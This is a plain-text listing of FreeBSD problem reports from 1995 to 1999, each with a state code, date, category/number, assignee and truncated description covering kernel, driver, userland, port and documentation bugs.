kern/8729 SYSV Semaphore blocks all threads o [1998/11/18] bin/8745 wosch adduser permit adding `root' and mail ali o [1998/11/20] kern/8773 Intel AN430TX motherboard ps/2 port not r f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S o [1998/11/23] kern/8824 Incorrect driver unit number in IDE BusMa o [1998/11/24] kern/8834 NFS can corrupt local file cache o [1998/11/24] conf/8854 boot.flp does not probe atapi cdrom o [1998/11/24] i386/8855 sos can't mount CD in ATAPI drive after eject o [1998/11/25] bin/8865 syslogd hangs with serial console a [1998/11/28] kern/8875 Patch to allow DMA IDE with generic chips o [1998/11/29] conf/8903 /etc/rc can do NFS mounts before the netw o [1998/12/01] i386/8924 File transfers. Upload is 71Kbs downloa o [1998/12/02] kern/8940 system clock runs extremely slowly (and s o [1998/12/06] kern/8981 this also fixes X crashes and sio silo ov o [1998/12/09] kern/9030 DMPno2 - PCCards are not being recognised o [1998/12/10] i386/9044 #.0 pkgs require libkrb o [1998/12/16] kern/9095 swap detect error o [1998/12/19] kern/9129 Is it miss take ? So, ep deriver dose not o [1998/12/20] i386/9140 NIS "Magic cookie" in master.passwd slays o [1998/12/21] kern/9163 [patch] squid does not join a multicast g o [1998/12/27] bin/9214 kldload(8) error messages are inadequate o [1998/12/30] i386/9244 2.2.8 RELEASE Fixit floppy doesn't work.. o [1998/12/31] bin/9252 [patch] login program "login" don't set K o [1999/01/03] kern/9296 pps driver missing header file o [1999/01/03] kern/9297 pps driver doesn't clear ppbus control po o [1999/01/06] bin/9350 nvi incorrectly reads files with very lon o [1999/01/06] kern/9355 can't select() for writes on a bpf o [1999/01/07] bin/9362 "lpc start queue" doesn't work in 3.0-R & o [1999/01/07] bin/9379 pppd does not go through all interfaces l o [1999/01/08] kern/9391 if_addmulti doesn't check for retifma == o [1999/01/09] kern/9407 "make kernel" yields buggy kernel in cera o [1999/01/09] kern/9408 parameter reversed to a pci_cfgwrite in p o [1999/01/09] kern/9411 System crash on swapping to hole-files o [1999/01/09] kern/9413 profiling does not work with elf kernels o [1999/01/10] i386/9431 wd.c Does nto recognize certain LBA disks o [1999/01/11] bin/9440 obrien amd can't mount filesystems with type:=uf o [1999/01/11] bin/9444 mount_mfs uses lots of swap. o [1999/01/12] bin/9464 fenner Fix for fetch ignoring FTP_PASSIVE_MODE e o [1999/01/13] kern/9478 support for running a script from kldload o [1999/01/14] kern/9487 pcm: mixer's synth and cd devices are swa o [1999/01/14] bin/9495 su doesn't look at login.cnf all the time o [1999/01/15] bin/9516 ftpd doesn't honor invalid shelll in logi o [1999/01/17] kern/9537 ep0 driver : no buffer space available o [1999/01/17] bin/9544 syntax error concerning loading vinum fro o [1999/01/17] kern/9548 UNION fs corrupts data and has undefined o [1999/01/17] kern/9550 The latest -current as of 17 January has o [1999/01/21] kern/9599 SMP hang after reseting CPU 1 o [1999/01/21] kern/9612 grog NFS mounts on dual-homed server may hang o [1999/01/22] docs/9618 hoek many typos in groff_mm(7) o [1999/01/24] ports/9665 ache cannot start apache server o [1999/01/25] kern/9673 ISO CD-ROM Problem o [1999/01/25] ports/9688 cwt The current tcl80 port has problems, does o [1999/01/28] i386/9759 Tar process hangs on buggy tapes o [1999/02/01] kern/9862 system crashes writing to msdos jaz disk o [1999/02/02] kern/9883 MGET()(and variants) return NULL with M_W o [1999/02/04] misc/9903 thread enabled program can't use popen/sy o [1999/02/04] kern/9910 Heavy traffic renders FreeBSD acting as f s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/06] i386/9933 No error reported writing to write-protec o [1999/02/06] kern/9935 vmstat reprots bad AVM values o [1999/02/08] kern/9961 When loading if_ppp_mod.o system crashes, o [1999/02/08] i386/9962 Install Panics in with integer divide fau o [1999/02/08] kern/9974 Large amounts of kernel clock drift with o [1999/02/09] kern/9980 savecore fails with large (2gig+) swap pa o [1999/02/09] bin/9982 inet_addr(3) should be return 32bit uint. o [1999/02/10] misc/10009 jdp dlopen will crash when opening some strip o [1999/02/11] kern/10021 MOUNTING A EXT2FS A AFTER MOUNTING AN MSD o [1999/02/11] bin/10031 ypxfr does not work with Solaris master s o [1999/02/13] kern/10066 problem with a X-Window and syscons drive o [1999/02/14] i386/10089 ATAPI tape driver (wst) doesn't handle En a [1999/02/14] ports/10094 jfitz autogeneration of msql user failed o [1999/02/15] kern/10107 interlock situation with exec_map and a p o [1999/02/18] i386/10150 Compaq fxp0 Does not work on 3.0 or 3.1 b o [1999/02/18] i386/10151 ATAPI CD problem o [1999/02/19] conf/10163 init does not start when /var/msgs is a s o [1999/02/23] bin/10230 -T and -B not implemented on filehandles o [1999/02/25] misc/10259 FTP install hangs for 3.1-RELEASE o [1999/02/25] bin/10264 passwd(1) tryis NIS even with `-l' switch o [1999/02/25] kern/10265 file locking does not work with kernel pt o [1999/02/26] kern/10280 Display Adapters (PCI) probed wrong way - o [1999/02/28] misc/10302 installer o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible o [1999/02/28] kern/10316 le0 goes OACTIVE after some time o [1999/03/01] bin/10341 memory leak in setenv(3) o [1999/03/02] bin/10353 ypserv gets segmentation violation o [1999/03/03] kern/10381 hlfsd/NFS failure -- directory cached bet a [1999/03/04] ports/10385 billf New port: apache13-modperl o [1999/03/05] kern/10411 top, vmstat, iostat show 0% cpu idle & us o [1999/03/06] misc/10418 libpam is built before libradius/libtacpl o [1999/03/07] kern/10466 resume causes crashes if BIOS extmem != R o [1999/03/08] kern/10492 broadcast IP address can be set on interf o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/09] bin/10511 incorrect return value in kvm_read(3) and o [1999/03/11] bin/10553 syslogd suddenly stopped logging o [1999/03/14] kern/10581 Kernel panic while using find on an ext2 o [1999/03/14] kern/10594 EXT2FS mount problems o [1999/03/14] bin/10596 I can't find out where someone is logged o [1999/03/15] misc/10599 [PATCH included]malloc/free breaks in cer o [1999/03/15] kern/10603 dcs Random system panics o [1999/03/15] kern/10607 Fast forwarding breaks when arp cache exp o [1999/03/16] bin/10615 make installworld DESTDIR=/some/dir o [1999/03/16] i386/10626 RTC BIOS diagnostic error on install o [1999/03/16] bin/10633 obrien [patch] tcpslice timezone problem and upd o [1999/03/17] i386/10646 Bridge code missing from ed0 driver in 3. o [1999/03/18] ports/10665 ports ports/graphics/sane needs access to /dev/ o [1999/03/19] kern/10671 setlogin(2) return EINVAL for length of n o [1999/03/19] kern/10676 3.1-RELEASE deadlocks under load with pro o [1999/03/20] kern/10698 de driver doesn't work with some tulip bo o [1999/03/23] kern/10747 [PATCH] ipfirewall `deny' rules act as `r o [1999/03/24] bin/10774 sio0 doesn't work well, i belive the prob o [1999/03/24] kern/10778 "ipforward_rt" is not cleared when routin o [1999/03/25] bin/10784 `make aout-to-elf-build' died in /usr/src o [1999/03/25] bin/10785 make aout-to-elf-install died in info tar o [1999/03/25] kern/10789 Second config of kernel doesn't overwrite o [1999/03/26] bin/10807 host(1) is broken - multiple options in o o [1999/03/27] bin/10821 des getpwent() fails on NIS clients after dro o [1999/03/29] i386/10862 wd.c STILL cannot recognize correct disk o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec o [1999/03/30] misc/10879 Cannot build aout binaries under 3.1-RELE o [1999/03/30] bin/10880 Profiler libraries missing o [1999/04/01] bin/10912 /bin/sh: Fix to prevent infinite loops on o [1999/04/03] i386/10928 su reboots the system after one day uptim o [1999/04/03] i386/10935 PCI cards detected twice o [1999/04/04] ports/10946 se kdm 1.1 does not work correctly - XBINDIR o [1999/04/05] bin/10963 brian date -v dosen't quite work o [1999/04/05] i386/10969 kernel fails to compile with ccs0 o [1999/04/06] i386/10983 lnc NIC driver doesn't work o [1999/04/06] bin/10991 lpd hangs system if printer not ready on f [1999/04/07] ports/11003 ports wmcdplay is not capable of playing an AUD o [1999/04/07] kern/11004 Quota Issues on SMP o [1999/04/07] bin/11005 `umount -f' does not work if the NFS-serv o [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim o [1999/04/10] ports/11059 ache ports/security/pgp does not extract o [1999/04/11] kern/11080 fatal trap 18 while trying to mount inval o [1999/04/11] kern/11084 3.1-R kernel trap 12 with interrupts o [1999/04/13] kern/11115 Sockets die in LAST_ACK and FIN_WAIT_1 st o [1999/04/13] bin/11119 NFS quotas fail to report if alternate fi o [1999/04/14] bin/11137 /bin/ps output loses the values for all p o [1999/04/16] kern/11164 The ie network driver panics during the i o [1999/04/16] bin/11169 warning: pointer to wrong page in cron(8) o [1999/04/18] kern/11199 3.1-RELEASE kernel page fault (trap 12) u o [1999/04/18] i386/11200 AMD PCnet lnc0/lnc1 problem o [1999/04/18] kern/11208 Complete system hang/freeze. No PANIC me o [1999/04/20] bin/11247 fetch doesn't notice FTP error after RETR o [1999/04/21] kern/11255 Fore System ATM Card not working o [1999/04/21] kern/11266 frequent crashes with "Page fault, fatal o [1999/04/22] bin/11283 fetch http-timeout/timestamp bug o [1999/04/23] i386/11291 anic: ffs_alloccg: map corrupted o [1999/04/23] bin/11296 fetch(1) fails to resolve names in http m o [1999/04/26] conf/11336 Broken data sent to printer through devic o [1999/04/28] kern/11366 Filesystem can cause hang/crash in certai o [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/04/29] bin/11382 generated code using rpcgen with -b optio o [1999/04/29] kern/11385 PCNet/PCI Ethernet adapter works in 3.1-R o [1999/04/29] i386/11395 ghostscript5.50 does not print properly, o [1999/04/30] kern/11405 pwd_mkdb with no tmp space leads to kerne o [1999/05/02] i386/11454 mkdir() and chdir() doesn't check argumen o [1999/05/03] kern/11462 CS network interface driver (for CS89XX b o [1999/05/03] bin/11464 obrien union copies likely broken for alpha egcs o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 msmith CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] kern/11513 cannot mount CD-ROM: Device not configure o [1999/05/05] misc/11523 3.1-STABLE BRIDGE option does not work o [1999/05/05] misc/11525 [PATCH] Networking patches to increase # o [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/07] kern/11563 pci_unmap_int doesn't do anything o [1999/05/10] ports/11636 jfitz p5-Mail-Folder missing dependencies o [1999/05/12] i386/11664 lnc1 NIC fail to work o [1999/05/12] bin/11666 ypserv fails to reply host name resolutio o [1999/05/12] kern/11679 httpd and perl5 processes stuck in "nocha o [1999/05/13] kern/11686 APM: Always "Resume failure" from suspend o [1999/05/13] kern/11692 3.1-stable deadlock o [1999/05/13] kern/11697 dg Disk failure hangs system o [1999/05/14] i386/11720 FreeBSD 2.2.8 can't load fixit disk o [1999/05/18] kern/11766 Can not traceroute through ipnat. o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/19] misc/11778 mpz_get_str() in libgmp leads up to cored o [1999/05/19] misc/11790 boot manager bug o [1999/05/20] misc/11800 gibbs Problem with scsi AHA2940 and sony SDT-20 o [1999/05/20] i386/11801 Remounting CD on IDE CDROM after eject fa o [1999/05/20] kern/11808 read/write mounted write-protected floppi o [1999/05/21] kern/11815 mjacob SCSI tape driver fails on media type reco o [1999/05/21] kern/11821 /dev/fd0a hangs on large files, including o [1999/05/22] docs/11852 jkh 3.X install requires 12MB of RAM, not 8 o [1999/05/23] kern/11867 Sound driver loses interrupts, no sound o [1999/05/28] kern/11911 3.1-R : writing file larger than floppy s o [1999/05/28] conf/11913 jkh Problem about /stand/sysinstall and /etc/ o [1999/05/28] kern/11915 access system call says file is readable o [1999/05/28] kern/11919 kldload doesn't return error on loading a o [1999/05/28] kern/11922 missing reentrant interfaces for getpwnam o [1999/05/29] kern/11928 kldload loads kernel modules even if ther o [1999/05/29] kern/11936 wine don't work (SMP) (-STABLE) o [1999/05/29] kern/11937 vm problems after havy memory usage o [1999/05/31] kern/11969 VM_fault with mmap'd CDROM data. o [1999/06/01] ports/11977 ports Eterm port is unable to access .Xauthorit o [1999/06/02] i386/11991 fdisk does not assign slices to unused pa o [1999/06/02] bin/11992 /usr/src/sbin/mountd/mountd.c has '#ifdef o [1999/06/04] kern/12022 System clock timewarps o [1999/06/06] bin/12054 explicit -ltermcap after -lncurses causes o [1999/06/06] kern/12062 sa tape driver with Cipher 60M SCSI QIC t o [1999/06/08] bin/12091 syslog packets from a remote machine are o [1999/06/08] kern/12092 vpo driver not working in 3.2-RELEASE o [1999/06/09] kern/12104 Certain cdcontrol commands don't work pro o [1999/06/10] bin/12120 named crashes. o [1999/06/10] gnu/12122 cc hangs on STDIN with -pipe and .s files o [1999/06/11] bin/12136 obrien /sbin/dhclient-script: weird route comman o [1999/06/11] bin/12137 something wrong with shell -- functions w o [1999/06/12] ports/12174 ache bash terminate with corefile if pid > 320 o [1999/06/12] gnu/12175 gdb crashes with pids > 32736 o [1999/06/13] bin/12191 wcol is trying to allocate a shared memor o [1999/06/15] misc/12221 djpeg halt's freebsd box o [1999/06/16] bin/12242 segmentation fault running /usr/bin/fmt o [1999/06/16] kern/12247 userlevel program let kernel hang o [1999/06/17] kern/12262 pcm sound driver with SB16pnp does not ap o [1999/06/18] bin/12272 The ctype locales print an error message o [1999/06/18] kern/12274 cd mount problem o [1999/06/20] kern/12305 clock() ticks backwards o [1999/06/21] kern/12320 error 6: panic: cannot mount root (2) o [1999/06/22] bin/12349 des 3.2-R inetd doesn't re-read ALL configura o [1999/06/25] conf/12387 CDROM boot failure on Thinpad 770X, 380ED o [1999/06/25] kern/12394 3.2-RELEASE, rl0 ethernet interface freez o [1999/06/28] kern/12434 signal 11 (core dumped) on mysqld when ma o [1999/06/30] kern/12464 bad reference in struct vm_zone o [1999/07/01] kern/12484 [PATCH] bpf_filter() broken o [1999/07/03] bin/12496 yppush broken when pushing to 2 or more s o [1999/07/03] bin/12497 src/etc/periodic/daily/150.clean-hoststat o [1999/07/04] kern/12508 gdb fails to vmcore.0 o [1999/07/06] i386/12529 Linksys ether16 NE2000 compat. won't conf o [1999/07/06] bin/12538 getpwuid() NIS UID override fails o [1999/07/06] ports/12541 ports gtk installs itself where it can't be fou o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/07] docs/12557 nik There are no man pages for the widely use a [1999/07/08] bin/12564 jkh Sysinstall can not use live filesystem fr o [1999/07/09] misc/12577 Can't link code using catopen o [1999/07/09] ports/12584 stb directories made during 'make install' ar o [1999/07/13] kern/12632 Panic (trap 18) with Symbios SCSI control o [1999/07/14] ports/12637 ports patch to help multi-byte support in windo o [1999/07/14] misc/12640 Can use 2nd CD-ROM for fixit mode. o [1999/07/15] kern/12646 IGMP reports not sent if no multicast rou o [1999/07/16] gnu/12662 tar verification doesn't work in 3.2-RELE o [1999/07/18] kern/12703 tx0 truncates skip packets o [1999/07/20] ports/12714 ports dylan port doesn't compile o [1999/07/20] bin/12727 billf Game patches from NetBSD o [1999/07/21] conf/12745 diffs to delay start of amd rwhod timed o o [1999/07/21] ports/12746 ache problem with bash-2.03(1) port (/usr/port o [1999/07/21] i386/12749 marcel Bug in link() and all other filename func o [1999/07/22] kern/12758 Adjusting the idle priority of a process o [1999/07/23] i386/12771 lpt hangs and never works again, even aft o [1999/07/24] kern/12800 buffer leak in cluster_wbuild o [1999/07/26] alpha/12821 alpha slib.aq for the 3.2-RELEASE alpha distrib o [1999/07/26] ports/12824 dirk MySQL client only compile doesn't check t o [1999/07/27] kern/12831 sos CD-rom cannot be mounted o [1999/07/27] conf/12832 config -g creates broken Makefile in 3.2- o [1999/07/27] kern/12838 PC-Card ctlr(0) Vadem 365 support seems b o [1999/07/28] misc/12856 installworld over nfs broken (3.2S) o [1999/07/29] kern/12869 panic: softdep_flushfiles: looping o [1999/07/30] kern/12884 Hot to panic FreeBSD-3.2-Release o [1999/07/31] ports/12905 jmz Graphical setup utility won't always inst o [1999/08/01] bin/12911 alfred NFS umounts are not properly done if just o [1999/08/01] bin/12912 [PATCH] lpd leaves lock file permissions o [1999/08/02] kern/12927 [PATCH] using BROKEN_KEYBOARD_RESET optio o [1999/08/02] ports/12930 asami libtool create defuct makefiles if PREFIX o [1999/08/03] misc/12938 gethostbyaddr(209.201.116.19) - Bus error o [1999/08/04] kern/12979 Response time continually slows on idle m o [1999/08/05] conf/12984 /etc/rc* does not contain any support for f [1999/08/05] docs/12988 doc [Patch] Fix more occurances of 'sd' in FA o [1999/08/05] kern/12991 system queue is cleared when a port or pi o [1999/08/06] kern/12996 ifconf in sys/net/if.c returns larger buf o [1999/08/06] bin/13008 pthread_kill does not always work o [1999/08/07] conf/13013 Selecting CDROM as install media doesn't o [1999/08/08] kern/13022 ipfilter is out-of-date o [1999/08/08] misc/13027 sysinstall has no /dev entry for wfd0s4 ( o [1999/08/09] kern/13049 [PATCH] NFS replies with incorrect source o [1999/08/10] i386/13058 Installation hangs after commit f [1999/08/13] pending/13113gnats-adminpanic related (proberbly) to vnode o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/08/14] ports/13145 se kaudioserver runs amok on logout o [1999/08/15] kern/13150 panic: ufs_dirbad: bad dir o [1999/08/15] ports/13170 ports New port: UW-Imap with maildir and qmail o [1999/08/15] gnu/13172 Bug in workaround of russian locale & sor o [1999/08/16] kern/13180 panic: ffs_alloccg: map corrupted o [1999/08/17] kern/13196 [BTX] page in BTX has problem(quit key) o [1999/08/17] kern/13198 panic: vm_fault: fault on nofault entry o [1999/08/17] gnu/13200 The assembler chokes on very long operand o [1999/08/18] kern/13234 .../netinet/ip_input.c should include opt o [1999/08/21] bin/13286 jhay [SECURITY] Potential IPXrouted(8) /tmp se o [1999/08/21] bin/13292 Ping -s does not work o [1999/08/24] bin/13350 make clean in bsd.obj.mk no longer proper o [1999/08/24] ports/13370 ache elm-port upgraded, improved o [1999/08/25] misc/13378 Tecra 8000 hangs in UserConfig, cannot co o [1999/08/25] kern/13382 Only 1 parallel port supported if pps ena o [1999/08/25] bin/13383 sys/netinet/in.h violates C++ spec. o [1999/08/26] kern/13405 syslogd get system hang o [1999/08/27] gnu/13427 gdb reports wrong info o [1999/08/28] gnu/13438 objc forward core dump using system cc o [1999/08/29] i386/13452 changing to root device wd0s1a \n error 2 o [1999/08/29] bin/13463 /bin/sh does not handle interrupts correc o [1999/08/30] misc/13470 Old problem re-introduced: TCP sucket buf o [1999/08/31] bin/13504 troubles with the ipfw tool o [1999/09/01] kern/13517 hang system o [1999/09/05] kern/13587 Voxware MIXER_READ ioctl corrupts memory o [1999/09/06] kern/13593 Problems with FIFO and select o [1999/09/07] kern/13612 gibbs "Timedout SCB handled by another timeout" o [1999/09/07] kern/13630 system halts after npx0 detected on 3.2 i o [1999/09/07] kern/13632 Floppy hangs system o [1999/09/08] ports/13636 billf beroftpd also affected by proftpd/wuftpd o [1999/09/08] kern/13644 select(2) timer inaccurate, especially wi o [1999/09/08] kern/13646 Kernel Trap error when booting 3.3-RC ker o [1999/09/09] i386/13655 sysmouse, signal 10 and XF86_S3 o [1999/09/09] ports/13656 obrien update ports: dlint 1.3.3 o [1999/09/10] kern/13678 sos hard lockup's on tsleep in atapi_queue_cm o [1999/09/10] bin/13679 ncurses-based programs eat 100% CPU after o [1999/09/10] bin/13691 tcpslice cannot extract over 2GB part of o [1999/09/11] bin/13703 MCNP compilation problem o [1999/09/12] bin/13711 root fs not properly unmounted after shut o [1999/09/12] ports/13714 stb netatalk-1.4b2+asun2.1.3 fails chmod g+s o [1999/09/13] kern/13721 yokota There is no way to force system panic fro o [1999/09/13] conf/13724 Prevent ".: Out of file descriptors" erro o [1999/09/13] gnu/13729 strip(1) exits with an error on script fi o [1999/09/13] kern/13736 enabling NAT on 3.3RC results in panic sb o [1999/09/13] kern/13740 wrong IP statistics o [1999/09/14] docs/13746 doc Incorrect version in FAQ o [1999/09/14] kern/13752 "tl0: adapter check: 180005" mesages keep o [1999/09/15] kern/13757 wpaul tl0: adapter check: 180005 mesages keep c o [1999/09/15] i386/13765 memory problem: compilation of emacs dies o [1999/09/15] bin/13766 ldconfig doesn't recognize symbolic links o [1999/09/15] bin/13768 sh MAKEDEV cdN creates all cd(N-1)-device o [1999/09/15] misc/13771 brian Packet fragment filter bug in user-land P o [1999/09/16] conf/13775 multi-user boot may hang in NIS environme o [1999/09/16] ports/13776 jmz The XFree86-3.3.5 port -- one of the kerb o [1999/09/16] conf/13785 boot block/manager problem at installatio o [1999/09/17] i386/13787 lnc driver isn't really the lnc driver o [1999/09/18] kern/13810 3.3 panic rlist_free: free start overlaps o [1999/09/18] i386/13811 ide cdrom stops recognizing audio cdroms o [1999/09/19] bin/13818 `ipfw' doesn't grok "log" keyword o [1999/09/19] misc/13837 peter src/contrib/bind is outdated. o [1999/09/19] ports/13839 se kdegraphics11 'make PREFIX' fix, one comp o [1999/09/19] i386/13847 missing support for INT 0x13 extensions i o [1999/09/20] i386/13857 Problem with switching between processes o [1999/09/22] conf/13900 jkh [PATCH] sysinstall can get SIGPIPE if a d o [1999/09/22] alpha/13912 alpha unaligned access Problem seems to be aff o [1999/09/23] misc/13920 pppd acts differently on 3.3-RELEASE ("mi o [1999/09/24] kern/13941 ncr0: SCSI phase error on GENERIC kernel o [1999/09/26] misc/13978 peter a write to last column bug appears since o [1999/09/26] bin/13980 Parameter expansion pattern removal bug i f [1999/09/27] docs/13993 phantom Another commercial database app for FreeB o [1999/09/27] kern/13997 phk RLIMIT_NPROC works unadequately for jails o [1999/09/28] kern/14026 Many network connections get left in the o [1999/09/28] i386/14027 "disklabel -r -w" on new disk reports "No o [1999/09/28] kern/14033 Data acq process gets stuck in vmopar o [1999/09/29] kern/14042 mbuf shortage and allocation with M_WAIT o [1999/09/30] ports/14045 ports Upgraded Xmms to version 0.9.5.1 o [1999/09/30] kern/14060 3.3-STABLE on primary mail server panics o [1999/09/30] bin/14069 Buffer overflow in mail(1) o [1999/09/30] kern/14072 Rebooting in FreeBSD 3.3 wipes out known o [1999/10/01] conf/14075 CDROM not being recognized during certain o [1999/10/02] kern/14096 parallel port -- ppi -- driver broken aft o [1999/10/02] conf/14098 routing problem on DHCP client with netwo o [1999/10/03] bin/14102 make world -DWANT_AOUT fails in lib/compa o [1999/10/04] misc/14121 resurfaced bug in rmt preventing remote d o [1999/10/04] kern/14123 lnc driver is not working o [1999/10/04] ports/14128 torstenb Wrong group and mode on postdrop program o [1999/10/04] i386/14135 lpt1 nolonger exists after 3.2-RELEASE o [1999/10/05] kern/14144 bad conversions in kern_fork() o [1999/10/05] ports/14153 obrien xwpe has no distribution tar file o [1999/10/06] docs/14173 doc bind(2) sets errno to undocumented EAGAIN o [1999/10/07] misc/14178 FreeBSD 3.2 - Calls from CGI scripts, cro o [1999/10/07] kern/14183 grog bridge forwarding corrupted broadcast IP o [1999/10/07] ports/14186 se kdebase11 package not compiled correctly o [1999/10/07] bin/14202 tgetstr() inserting termlib "%pn" into ou o [1999/10/08] ports/14213 ports opendx port does not run o [1999/10/09] kern/14226 panic: no mbufs o [1999/10/10] bin/14250 restore(8) can loop if tty goes away or w o [1999/10/11] misc/14264 Combination of aio_read(), pthread_cond_w o [1999/10/12] i386/14282 Using FreeBSD 3.* ThinkPad 600E doesn't r o [1999/10/12] ports/14283 ache apache13 htpasswd dumps core o [1999/10/12] kern/14285 dillon NFS client appears to lose data o [1999/10/12] ports/14292 ports tkfont does not work with XiG X-server o [1999/10/14] i386/14324 wst OR atapi drivers won't work o [1999/10/14] misc/14326 kerberos4 pam-related breakage in current o [1999/10/14] misc/14327 names used in netdb.h may conflict with n o [1999/10/14] i386/14334 imp AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/15] kern/14354 grog vinum cannot compile for alpha o [1999/10/17] i386/14372 The audio ioctl SNDCTL_DSP_SETFMT affects o [1999/10/17] ports/14387 ports New port: chinese/cdict o [1999/10/17] ports/14388 ports New port: chinese/tocps o [1999/10/18] ports/14398 ports New port: mod_dav module for Apache o [1999/10/19] ports/14423 obrien Build of lsof fails since 'struct namecac o [1999/10/20] misc/14431 Network Interface Problem o [1999/10/20] ports/14434 ache update ports: ftp/wu-ftpd to 2.6.0 o [1999/10/20] bin/14444 enigma command can't decrypt files encryp o [1999/10/21] i386/14446 Doesn't boot on Mobile Celeron o [1999/10/22] kern/14457 SIOCGIFCONF uses too much memory o [1999/10/23] bin/14472 date for Y#K o [1999/10/23] kern/14486 repeated arrival/departure of disks leads o [1999/10/24] docs/14505 doc Addition to release notes for Intel PRO/1 o [1999/10/25] ports/14524 markm PERL 5.005_03 Config.PM on 3.2-STABLE say o [1999/10/25] kern/14536 kernel panic on 64KB block size ufs files o [1999/10/26] kern/14546 SB128PCI work incorrect play wav-files un o [1999/10/26] ports/14548 peter rdist6 has /usr/lib/sendmail compiled int o [1999/10/26] kern/14549 3C509 broken in 3.3 o [1999/10/27] kern/14566 Non-kernel programs have little/no contro o [1999/10/29] kern/14603 cannot install distribution "Local" from o [1999/10/30] ports/14615 ports Emacs scrambles the screen on the console f [1999/10/31] ports/14625 green pidentd doesn't work correctly for finger o [1999/10/31] bin/14626 sendmail 8.9.3 bug with aliases in -CURRE o [1999/10/31] ports/14635 mph Update port: lang/intercal to 0.19 700 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [1995/01/11] i386/105 bde Distributed libm (msun) has non-standard s [1995/05/13] bin/401 Add REMOTE_* variables s [1995/06/15] bin/517 Bad group change with 'install' o [1995/07/09] misc/605 wpaul NIS: get*bynis routine problems s [1995/08/05] gnu/655 ld -r of shared objects worked in 1.1.5, s [1995/08/07] bin/658 ifconfig alias has to be separately given s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p s [1995/10/03] kern/765 umount -f can`t umount a NFS filesystem i s [1995/11/20] kern/831 one minor complaint about the kernel visu s [1995/11/27] bin/841 stale nfs mounts cannot be umounted o [1995/11/30] bin/854 dg swapinfo shows incorrect information for a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases s [1996/03/20] kern/1090 iostat displays incorrect sps count s [1996/03/20] bin/1093 route's diagnostic is weird o [1996/04/06] kern/1119 dg Mounted EXT2FS partition is not cleanly u s [1996/06/11] bin/1312 automounter hangs on boot s [1996/06/13] bin/1320 dump limits blocksize to 32K s [1996/07/07] bin/1375 jraynard Extraneous warning from mv(1) [PATCH] o [1996/07/24] misc/1428 ncurses doesn't always display ALTCHARSET o [1996/09/06] bin/1577 peter mail -f foo does not look in current dire s [1996/09/08] bin/1589 [PATCH] ftp fails to flush output o [1996/09/14] gnu/1611 phk groff should use "system-wide" papersize s [1996/09/19] kern/1654 [PATCH] In procfs, vattr doesn't contain o [1996/09/23] i386/1671 joerg s2 map in pcvt isn't ISO 8859-1 and claim s [1996/10/13] misc/1791 syslimits.h does not allow overriding def o [1996/10/20] bin/1849 gdb sets library breakpoints on the wrong s [1996/10/24] bin/1881 file(1) misidentifies Sun3/m68k executabl s [1996/11/01] bin/1941 danny wtmp and monthly rotation s [1996/11/01] bin/1943 route(8) args s [1996/11/04] gnu/1961 [PATCH] uucp logging files are in /var/sp s [1996/11/06] bin/1970 csh limtail() bug s [1996/11/16] bin/2036 cpio size wraparound s [1996/11/19] bin/2061 DEBUG_FLAGS in bsd.lib.mk is broken s [1996/11/19] bin/2065 in tzsetup/sysinstall, allow user to type s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/11/28] bin/2119 [PATCH] mount lies to child about argv0, s [1996/12/02] bin/2137 vm statistics are bad s [1996/12/12] kern/2199 joerg [PATCH] Got a lots of "Target Busy" messa s [1996/12/14] bin/2216 [PATCH] Ada specs not being compiled into o [1996/12/17] i386/2239 jmg some interrupts take too long (i.e. BT946 a [1996/12/21] bin/2265 guido su(1) does not call skeyaccess() o [1996/12/24] kern/2273 dufault support for POSIX.4 / POSIX.1a RT-schedul s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1996/12/29] bin/2315 peter tail segfaults on NFS permission denied s [1996/12/30] kern/2327 [PATCH] `Green' saver for pcvt o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/14] kern/2492 AIMS Lab RadioTrack driver for FreeBSD 2. o [1997/01/26] i386/2598 ep0 in EISA mode hangs if ep0-device (ISA o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist o [1997/01/28] bin/2604 dufault Added POSIX.4/POSIX.1b shm_open()/shm_unl o [1997/02/02] gnu/2637 tar dumped core with -g option. a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d o [1997/02/05] bin/2668 modification suggested for rarpd o [1997/02/11] kern/2716 od.c/sd.c non 512 byte/sector support imp o [1997/02/14] bin/2737 yppasswd fails to change password on a su o [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/03] kern/2857 DE500 board exhibits capture effect o [1997/03/03] kern/2865 peter NFS client hangs on umount, ls, df when N o [1997/03/06] docs/2897 steve send-pr categories should be explained so o [1997/03/06] bin/2898 fenner arp -a -n buglet o [1997/03/10] bin/2934 sh(1) has problems with $ENV o [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) o [1997/03/18] misc/3024 make reinstall in /usr/src requires writa o [1997/03/22] kern/3061 route does not accept -genmask o [1997/03/31] gnu/3157 Patches to gas and gdb to support MMX ext o [1997/04/07] bin/3221 rpc.rusersd : can't communicate with SunO o [1997/04/07] misc/3225 [PATCH] uucpd.c should normalize host nam o [1997/04/08] misc/3237 SCRIPTS addition to bsd.prog.mk o [1997/04/09] bin/3242 incorrect prototype for initgroups o [1997/04/14] kern/3281 errors when "rm -r"-ing in a mounted ext2 o [1997/04/14] kern/3282 ext2fs causes fs-unmount at shutdown/rebo o [1997/04/14] bin/3284 [PATCH] symorder(1): -t option doesn´t wo 